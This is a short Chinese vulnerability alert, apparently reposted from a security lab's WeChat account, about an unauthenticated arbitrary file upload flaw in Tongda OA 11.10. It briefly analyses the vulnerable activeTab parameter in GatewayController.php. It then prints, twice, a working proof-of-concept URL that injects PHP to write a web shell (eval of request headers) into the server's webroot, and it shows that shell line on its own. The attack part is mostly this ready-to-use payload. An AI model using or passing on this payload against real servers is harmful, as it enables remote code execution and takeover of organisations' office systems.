【漏洞预警】通达OA 11.10 未授权任意文件上传漏洞
2023-5-26 15:6:30 Author: 利刃信安攻防实验室(查看原文) 阅读量:179 收藏

通达OA 11.10 未授权任意文件上传漏洞

http://url/general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/YAOA/webroot/general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage

官网地址:

https://www.tongda2000.com/

漏洞分析

通达OA v11.10存在未授权任意文件上传漏洞

官网:

https: //www.tongda2000.com/

版本:v11.10

  1. actionGetdata()方法存在于代码general\appbuilder\modules\portal\controllers\GatewayController.php中,其中activeTab参数可控。在 2018 行中,activeTab 参数位于 GetData 方法中。

在GetData()方法中,通过findall查询id参数,查看数组是否存在,如果查询到的id存在,则在第21行输入if语句。所以第38行的$attribute参数是可控的,导致数组关闭并通过 fwrite() 写入文件。

  1. 漏洞复现

poc

http://url/general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/YAOA/webroot/general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage

通过数组闭包用fwrite(fopen())写php文件,无参绕过全局过滤。

<? php eval(next(getallheaders()));

不带参数写入2.php文件,文件内容如下。


文章来源: http://mp.weixin.qq.com/s?__biz=MzU1Mjk3MDY1OA==&mid=2247504166&idx=2&sn=a7318a1722d95a0428ac56ef6e3adb18&chksm=fbfb61ebcc8ce8fdca34e11af50f8b0ad601df3310654c3216f4c7848b22e203124dfb218c2c#rd
如有侵权请联系:admin#unsafe.sh